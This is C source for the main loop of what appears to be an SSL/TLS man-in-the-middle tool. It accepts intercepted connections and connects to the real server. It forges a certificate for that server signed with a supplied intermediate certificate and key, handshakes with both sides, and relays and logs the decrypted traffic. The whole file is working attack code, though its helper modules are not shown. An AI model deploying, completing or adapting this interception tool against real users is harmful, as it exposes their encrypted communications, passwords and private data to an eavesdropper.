/*-
 * Copyright (c) 2002, Mike Benham
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 4. Neither the name of this program nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#include <openssl/ssl.h>

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include "network.h"
#include "mx509.h"
#include "mssl.h"
#include "log.h"


static void printUsage(char *command) {
  fprintf(stderr, "Usage: %s <port> <certfile>\n", command);
  exit(1);
}

static void handleNewConnection(int client, X509 *middleCert, EVP_PKEY *middleKey) {
  if (fork() == 0) {
    int       server        = NETWORK_connectToServer(client);       /* Connect to real server          */
    SSL      *serverSession = MSSL_handshakeWithServer(server);      /* SSL Handshake with real server  */
    EVP_PKEY *spoofedKey    = MX509_buildKeysForClient();            /* Build RSA Key Pair for new cert */
    X509     *spoofedCert   = MX509_buildCertificateForClient(serverSession, spoofedKey, middleCert, middleKey); /* Build spoofed cert */
    SSL      *clientSession = MSSL_handshakeWithClient(client, spoofedCert, spoofedKey, middleCert); /* SSL Handshake with client */
    FILE     *logFile       = LOG_init(client, server);

    LOG_printNotice(client, server);

    MSSL_shuttleData(client, clientSession, server, serverSession, logFile); /* Proxy Data */

    SSL_free(serverSession);
    SSL_free(clientSession);

    exit(0);
  }
}

static void acceptConnections(int server, X509 *middleCert, EVP_PKEY *middleKey) {
  int client;

  for (;;) {
    client = NETWORK_acceptConnection(server);    
    handleNewConnection(client, middleCert, middleKey);
  }
}

int main(int argc, char* argv[]) {
  int serverSocket;

  X509 *middleCertificate;
  EVP_PKEY *middleKey;

  if (argc < 3) printUsage(argv[0]);

  SSL_library_init();
  SSL_load_error_strings();

  if ((middleCertificate = MX509_loadCertificateFromFile(argv[2])) == NULL) {
    fprintf(stderr, "Couldn't read certificate from %s.\n", argv[2]);
    return 1;
  }

  if ((middleKey = MX509_loadKeyFromFile(argv[2])) == NULL) {
    fprintf(stderr, "Couldn't read private key from %s.\n", argv[2]);
    return 1;
  }

  if ((serverSocket = NETWORK_listenOnPort(atoi(argv[1]))) < 0) {
    fprintf(stderr, "Could not bind to port %d\n", atoi(argv[1]));
    return 1;
  }

  acceptConnections(serverSocket, middleCertificate, middleKey);

  return 1;
}
